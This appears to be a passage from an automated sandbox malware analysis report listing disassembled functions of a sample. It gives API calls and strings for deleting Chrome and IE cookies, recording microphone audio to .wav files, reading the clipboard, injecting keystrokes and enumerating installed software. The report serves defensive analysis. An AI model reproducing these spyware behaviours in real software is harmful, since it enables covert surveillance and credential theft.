Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
PathFileExistsA.SHLWAPI(?), ref: 0040AEB9

Strings

P0F, xrefs: 0040AE6B
[IE cookies cleared!], xrefs: 0040AF06, 0040AF2B
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040AE43
Cookies, xrefs: 0040AE3E
[IE cookies not found], xrefs: 0040AE81

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P0F$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-1451598199
Opcode ID: 95fff169455ce68c0b5a277e3f6e58ad6cae9d31946e4611f9b4ae704eb31903
Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
Opcode Fuzzy Hash: 95fff169455ce68c0b5a277e3f6e58ad6cae9d31946e4611f9b4ae704eb31903
Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA

Function 00441548 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441566

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00441578
_free.LIBCMT ref: 0044158B
_free.LIBCMT ref: 0044159C
_free.LIBCMT ref: 004415AD

Strings

pF, xrefs: 0044155C
KS, xrefs: 00441548, 00441557, 0044156C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: pF$KS
API String ID: 776569668-4051209147
Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E

Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
__alloca_probe_16.LIBCMT ref: 00447056
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
__alloca_probe_16.LIBCMT ref: 0044713B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
__freea.LIBCMT ref: 004471AB

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

__freea.LIBCMT ref: 004471B4
__freea.LIBCMT ref: 004471D9

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8

Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7

Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414F41
EmptyClipboard.USER32 ref: 00414F4F
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlock
String ID:
API String ID: 2813074840-0
Opcode ID: 1ffc4b267463cd0963ccde96e95f83742c66c38552b605f7a87e557baad1c83c
Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
Opcode Fuzzy Hash: 1ffc4b267463cd0963ccde96e95f83742c66c38552b605f7a87e557baad1c83c
Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A

Function 0041A47D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 0041A47F
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
RegCloseKey.ADVAPI32(?), ref: 0041A749

Strings

DisplayName, xrefs: 0041A4C6

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName
API String ID: 1332880857-3786665039
Opcode ID: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
Opcode Fuzzy Hash: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A

Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
__fassign.LIBCMT ref: 00447814
__fassign.LIBCMT ref: 0044782F
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69

Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00453F23

Strings

$-E, xrefs: 00453E47, 00453F38
$-E, xrefs: 00453EEA

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free
String ID: $-E$$-E
API String ID: 269201875-3140958853
Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A

Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D30

Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9

waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F

Strings

.wav, xrefs: 00401D49
%Y-%m-%d %H.%M, xrefs: 00401D21

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 5a7c6690862a3c12eec0f1c385f38fa44ed12cb14a4004433c4f1684d5e2403e
Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
Opcode Fuzzy Hash: 5a7c6690862a3c12eec0f1c385f38fa44ed12cb14a4004433c4f1684d5e2403e
Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E

Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269

Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A

_free.LIBCMT ref: 0044E128

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E133
_free.LIBCMT ref: 0044E13E
_free.LIBCMT ref: 0044E192
_free.LIBCMT ref: 0044E19D
_free.LIBCMT ref: 0044E1A8
_free.LIBCMT ref: 0044E1B3

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654

Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C

Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
GetLastError.KERNEL32 ref: 0040AA28

Strings

UserProfile, xrefs: 0040A9EE
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
[Chrome Cookies found, cleared!], xrefs: 0040AA4E
[Chrome Cookies not found], xrefs: 0040AA42

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
Opcode Fuzzy Hash: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F

Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00438A09
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
__allrem.LIBCMT ref: 00438A3C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
__allrem.LIBCMT ref: 00438A71
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D

Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00442E37
__cftoe.LIBCMT ref: 00442E69

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C

Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444B89
__freea.LIBCMT ref: 00444C33
__freea.LIBCMT ref: 00444C51

Part of subcall function 00433BED: _free.LIBCMT ref: 00433C03

Strings

am/pm, xrefs: 00444CB4
a/p, xrefs: 00444D18

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59

Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
int.LIBCPMT ref: 0040F8D7

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040F917
std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
